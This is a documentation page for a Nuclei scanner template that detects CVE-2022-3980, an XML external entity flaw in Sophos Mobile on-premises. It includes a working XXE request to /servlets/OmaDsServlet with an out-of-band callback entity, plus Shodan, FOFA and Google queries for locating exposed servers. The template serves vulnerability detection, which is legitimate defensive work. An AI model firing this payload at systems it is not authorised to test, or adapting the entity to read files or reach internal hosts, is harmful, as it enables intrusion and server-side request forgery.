Skip to content
Nuclei Templates

Sophos Mobile managed on-premises - XML External Entity Injection

ID: CVE-2022-3980

Severity: critical

Author: dabla

Tags: cve,cve2022,xxe,ssrf,sophos

Description

Section titled “Description”

An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.

YAML Source

Section titled “YAML Source”
id: CVE-2022-3980


info:
  name: Sophos Mobile managed on-premises - XML External Entity Injection
  author: dabla
  severity: critical
  description: |
    An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability.
  reference:
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3980
    - https://github.com/bigblackhat/oFx
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-3980
    cwe-id: CWE-611
    epss-score: 0.35251
    epss-percentile: 0.97125
    cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: mobile
    shodan-query:
      - http.favicon.hash:-1274798165
      - http.title:"sophos mobile"
    fofa-query:
      - title="Sophos Mobile"
      - icon_hash=-1274798165
      - title="sophos mobile"
    google-query: intitle:"sophos mobile"
  tags: cve,cve2022,xxe,ssrf,sophos


http:
  - raw:
      - |
        @timeout: 50s
        POST /servlets/OmaDsServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: "application/xml"


        <?xml version="1.0"?>
        <!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
        <cdl>test</cdl>


    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 400"
          - "len(body) == 0"
        condition: and
# digest: 4b0a00483046022100e1ba7dd6bb4f27ed35690bedc7063fb3f7a67dfa1f23908a040a382966e32df0022100860c57a700554e3ba790676703d8a7bfa707cb46c9afc993cfa63c5b74a22a2b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-3980.yaml"

View on Github